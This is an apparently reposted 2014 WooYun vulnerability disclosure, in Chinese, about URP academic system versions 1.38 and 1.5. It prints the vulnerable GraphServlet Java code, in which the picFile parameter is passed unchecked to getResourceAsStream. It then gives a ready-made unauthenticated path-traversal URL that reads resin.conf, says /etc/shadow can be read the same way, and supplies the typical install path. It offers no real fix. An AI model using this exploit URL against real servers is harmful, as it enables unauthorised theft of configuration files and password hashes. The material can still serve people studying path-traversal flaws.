记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

URP通杀第二弹(短小精悍的小题目)

2014-09-21 04:15

跟第一发一样,上次那个有大牛提前发了,我来个新鲜的吧,一样的影响,数据量同上,1.38 1.5通杀。先来代码。补充下路径这个应用一般路径是/usr/local/resin-3.0.27/webapps/xfzzhjw/

public void service(HttpServletRequest req, HttpServletResponse res)

{

ServletOutputStream out;

InputStream is;

out = null;

is = null;

String graphId = req.getParameter("graphId");

byte b[] = null;

if (graphId != null)

{

b = GraphPool.get(graphId);

GraphPool.remove(graphId);

} else

{

String picFile = req.getParameter("picFile"); //一样的位置

is = getClass().getResourceAsStream(picFile);

b = ControlUtils.getStreamBytes(is);

}

res.setContentType("image/jpeg");

out = res.getOutputStream();

out.write(b);

out.flush();

Exception e;



一样的问题这个,不用登陆。

漏洞证明:

根据问题代码,构造一下http://x.x.x.x/servlet/com.runqian.report.view.html.GraphServlet?picFile=../../../../../../../../conf/resin.conf

唰华丽丽的全都泄露了。

1.png



同样的可以查看shadow

2.png

修复方案:

同第一个亲,cncert有可能的话求个证书~

知识来源: www.wooyun.org/bugs/wooyun-2014-065880

阅读:141789 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“URP通杀第二弹(短小精悍的小题目)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云